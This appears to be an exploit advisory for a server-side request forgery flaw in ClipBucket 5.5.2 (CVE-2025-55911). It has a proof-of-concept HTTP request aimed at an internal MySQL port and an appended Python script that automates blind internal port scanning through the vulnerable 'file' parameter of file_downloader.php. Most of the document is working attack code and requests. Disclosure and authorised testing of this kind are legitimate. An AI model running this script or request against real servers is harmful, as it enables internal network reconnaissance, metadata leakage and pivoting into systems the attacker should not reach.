# Exploit Title: ClipBucket 5.5.2 Build #90 - Server-Side Request Forgery (SSRF)
# Google Dork: N/A
# Date: 2025-09-11
# Exploit Author: Mukundsinh Solanki (r00td3str0y3r)
# Vendor Homepage: https://clipbucket.com
# Software Link: https://github.com/MacWarrior/clipbucket-v5
# Version: 5.5.2 Build #90
# Tested on: Ubuntu 20.04 LTS, PHP 7.4
# CVE: CVE-2025-55911

## Vulnerability Description:

An authenticated user with regular (non-administrative) permissions can trigger a Server-Side Request Forgery (SSRF) through the `file` parameter of `actions/file_downloader.php`. The parameter is a URL that the server fetches on the user's behalf, and the application does not restrict it to external hosts, so a crafted value makes the server issue HTTP requests to any host it can reach, including loopback and internal addresses that are not exposed to the attacker directly. This can be used for internal network enumeration, data exfiltration, or pivoting to other internal systems. Any registered account is sufficient; no administrative privileges are required.

## PoC Request:

```http
POST /upload/actions/file_downloader.php HTTP/1.1
Host: victim.com
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=validsession

file=http://127.0.0.1:3306/test.mp4
```

The server attempts to connect to the internal service at `127.0.0.1:3306` (the default MySQL port), demonstrating the SSRF. To confirm the behaviour independently of what the endpoint returns, point `file` at an HTTP listener you control and watch for the inbound request from the ClipBucket host; then compare response time and error behaviour for an open internal port against a closed one, which turns the blind request into an internal port scan.

## Impact:

- Internal service enumeration (port scanning of loopback and internal hosts)
- Potential leakage of cloud instance metadata where the host runs on a cloud provider
- Pivoting to internal systems that trust requests originating from the application server

Regards,
Mukundsinh Solanki
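The following script is an added example, not code from the advisory or from the ClipBucket project. It automates the PoC request above against several internal targets and compares status, body size and timing with a baseline target that is assumed to be closed, which is how a blind SSRF (one that does not echo the fetched content) is confirmed in practice. The base URL, the session cookie, the set of ports probed, and the choice of port 1 as the closed baseline are assumptions supplied by the operator; the endpoint path and the `.mp4` suffix are taken from the PoC.

```python
#!/usr/bin/env python3
"""Added example (not part of the original advisory or the ClipBucket project).

Probes the `file` parameter of actions/file_downloader.php with several
target URLs and compares the responses so that a blind SSRF (one where the
fetched content is not echoed back) can still be confirmed.

Assumptions that are NOT from the advisory: the base URL and session cookie
are supplied by the operator, the set of internal ports to probe, and that
reachable and unreachable targets produce measurably different timing,
status codes or body sizes.
"""
import time
import urllib.error
import urllib.parse
import urllib.request

# Path taken verbatim from the advisory's PoC request.
ENDPOINT_PATH = "/upload/actions/file_downloader.php"
# The PoC uses a .mp4 suffix; keeping it guards against any extension check
# in the downloader (assumption: the advisory does not say whether one exists).
PROBE_SUFFIX = "/test.mp4"


def build_form(target_url: str) -> bytes:
    """Encode the single `file` field exactly as the PoC request sends it."""
    return urllib.parse.urlencode({"file": target_url}).encode()


def build_probe_urls(host: str, ports) -> list:
    """Candidate internal targets, e.g. loopback services on common ports."""
    return [f"http://{host}:{port}{PROBE_SUFFIX}" for port in ports]


def send_probe(base_url: str, session_id: str, target_url: str,
               timeout: float = 15.0) -> dict:
    """POST one target URL to the vulnerable endpoint and record how the
    application responded (status, size, elapsed time). Needs network
    access; classify() below works purely on the dicts this returns."""
    req = urllib.request.Request(
        base_url.rstrip("/") + ENDPOINT_PATH,
        data=build_form(target_url),
        headers={
            "Content-Type": "application/x-www-form-urlencoded",
            "Cookie": f"PHPSESSID={session_id}",
        },
        method="POST",
    )
    started = time.monotonic()
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            status, body = resp.status, resp.read()
    except urllib.error.HTTPError as err:      # 4xx/5xx responses still carry a body
        status, body = err.code, err.read()
    except (urllib.error.URLError, OSError):    # timeout or connection failure
        status, body = None, b""
    return {
        "target": target_url,
        "status": status,
        "length": len(body),
        "elapsed": time.monotonic() - started,
    }


def classify(results, baseline_target: str, time_delta: float = 2.0) -> dict:
    """Compare every probe against a baseline target that is known (assumed)
    to be unreachable, such as a closed loopback port. A probe whose status,
    body size or timing deviates from that baseline is the signal a blind
    SSRF leaves; one indistinguishable from it proves nothing yet."""
    baseline = next(r for r in results if r["target"] == baseline_target)
    verdicts = {}
    for r in results:
        if r["target"] == baseline_target:
            continue
        deviates = (
            r["status"] != baseline["status"]
            or r["length"] != baseline["length"]
            or abs(r["elapsed"] - baseline["elapsed"]) >= time_delta
        )
        verdicts[r["target"]] = "differs from baseline" if deviates else "same as baseline"
    return verdicts


if __name__ == "__main__":
    import sys
    if len(sys.argv) != 3:
        sys.exit(f"usage: {sys.argv[0]} https://victim.com PHPSESSID_VALUE")
    base, sid = sys.argv[1], sys.argv[2]
    # Port 1 is assumed closed and serves as the baseline; 3306 is the advisory's target.
    targets = build_probe_urls("127.0.0.1", [1, 3306, 6379, 8080])
    outcome = [send_probe(base, sid, t) for t in targets]
    for target, verdict in classify(outcome, targets[0]).items():
        print(f"{target:40s} {verdict}")
```

Run it as `python3 ssrf_probe.py https://victim.com <PHPSESSID>`. A target reported as "differs from baseline" is one the server treated differently from a closed port, typically because the connection succeeded or hung; pair this with an out-of-band listener for a definitive confirmation before relying on the timing signal alone.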